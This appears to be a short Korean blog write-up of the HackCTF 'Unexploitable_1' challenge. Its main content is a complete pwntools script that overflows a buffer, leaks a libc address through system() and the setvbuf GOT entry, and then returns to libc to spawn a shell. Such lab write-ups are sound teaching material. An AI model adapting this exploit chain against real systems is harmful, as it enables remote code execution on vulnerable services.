system 함수를 이용해서 leak를 할 수 있다는 것을 처음 알았다
leak을 하고 rtl를 진행하면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3023)
e = ELF('./Unexploitable_1')
context.arch = 'amd64'
pr = 0x00000000004007d3
payload = 'A'*24
payload += p64(pr)
payload += p64(e.got['setvbuf'])
payload += p64(e.sym['system'])
payload += p64(e.sym['main'])
r.sendline(payload)
r.recvuntil('1: ')
leak = u64(r.recv(6) + '\x00\x00')
log.info('leak : {}'.format(hex(leak)))
libc_base = leak - 0x06fe70
system = libc_base + 0x045390
binsh = libc_base + 0x18cd57
payload = 'A'*24
payload += p64(pr)
payload += p64(binsh)
payload += p64(system)
r.sendline(payload)
r.interactive()'HackCTF' 카테고리의 다른 글
| HackCTF - You are silver (0) | 2021.11.26 |
|---|---|
| HackCTF - ROP (0) | 2021.11.26 |
| HackCTF - UAF (0) | 2021.11.26 |
| HackCTF - Pwning (0) | 2021.11.22 |
| HackCTF - Gift (0) | 2021.11.22 |
